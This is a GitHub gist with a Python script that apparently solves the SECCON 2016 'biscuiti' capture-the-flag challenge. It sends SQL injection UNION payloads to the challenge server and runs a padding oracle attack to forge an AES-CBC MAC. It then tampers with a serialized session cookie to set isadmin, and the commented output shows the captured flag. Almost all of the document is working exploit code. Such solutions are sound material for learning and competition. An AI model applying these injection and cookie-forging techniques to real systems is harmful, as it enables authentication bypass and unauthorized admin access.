Created
December 11, 2016 14:44
-
-
Save sonickun/dba8163394b849f70b968690c02c169b to your computer and use it in GitHub Desktop.
Revisions
-
sonickun created this gist
Dec 11, 2016 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,107 @@ from Crypto.Util.number import * from Crypto.Cipher import AES import requests import time import base64 def xor(a, b): return "".join([chr(ord(a[i]) ^ ord(b[i % len(b)])) for i in xrange(len(a))]) def add_pad(s): block_len = 16 pad_len = block_len - len(s) return s + chr(pad_len)*pad_len def padding_oracle_attack(cipher, plain): after_dec = "" for k in range(1, 17): for i in range(0, 256): pad = xor(after_dec, chr(k)*(k-1)) iv = "A"*16 c = "A"*(16-k) + chr(i) + pad + cipher assert len(iv + c) == 48 uname = "' UNION SELECT 'a', '%s" % (base64.b64encode(iv + c)) url = "http://biscuiti.pwn.seccon.jp/" payload = payload = {"username":uname, "password":""} r = requests.post(url, data=payload) if r.text.find("Hello") < 0: after_dec = chr(i ^ k) + after_dec print after_dec.encode("hex") break assert len(after_dec) == 16 prev_cihper = xor(after_dec, plain) return prev_cihper uname = "' UNION SELECT 'aaaaaaaaaaaaaaaaaaaaaaaaaa', 'hoge" url = "http://biscuiti.pwn.seccon.jp/" payload = payload = {"username":uname, "password":""} r = requests.post(url, data=payload) jsession = r.headers['set-cookie'].split("=")[1].replace("%3D", "=") u = base64.b64decode(jsession) j = u[:-16] mac_j = u[-16:] P = [j[i: i+16] for i in range(0, len(j), 16)] C = [""]*5 P[4] = add_pad(P[4]) C[4] = mac_j for i in reversed(range(1,5)): C[i-1] = padding_oracle_attack(C[i], P[i]) # C = ["88bb7c4931651cb975e48e9008c1a911".decode("hex"), # "6106b1d3251bea689f161c65d85705eb".decode("hex"), # "fc04f5ccfdcfed064cf3200eace65257".decode("hex"), # "d48fa8585b30d06b5b5515659b5f03d8".decode("hex"), # "a853d2fb8dc8d23b5bca133bb84039d7".decode("hex")] P[4] = add_pad("b:1;}") P[2] = xor(xor(P[4], C[3]), C[1]) uname = "' UNION SELECT 'aaaaaaaaaa%s', 'hoge" % P[2] url = "http://biscuiti.pwn.seccon.jp/" payload = payload = {"username":uname, "password":""} r = requests.post(url, data=payload) jsession = r.headers['set-cookie'].split("=")[1].replace("%3D", "=") u = base64.b64decode(jsession) j = u[:-16] mac_j = u[-16:] P = [j[i: i+16] for i in range(0, len(j), 16)] C = [""]*5 P[4] = add_pad(P[4]) C[4] = mac_j for i in reversed(range(3,5)): C[i-1] = padding_oracle_attack(C[i], P[i]) # C[2] = "3d469b651494c9a3289e00191a6bafb6".decode("hex") jsession = base64.b64encode('a:2:{s:4:"name";s:26:"aaaaaaaaaaaaaaaaaaaaaaaaaa";s:7:"isadmin";b:1;}'+C[2]) url = "http://biscuiti.pwn.seccon.jp/" header = {"Cookie":"JSESSION=%s" % jsession.replace("=","%3D")} r = requests.post(url, headers=header) print r.text # <!doctype html> # <html> # <head><title>Login</title></head> # <body> # Hello aaaaaaaaaaaaaaaaaaaaaaaaaa # SECCON{049a65dae9b075ebb68dd78d7c8c300f3b532065} # <div><a href="logout.php">Log out</a></div> # </body> # </html>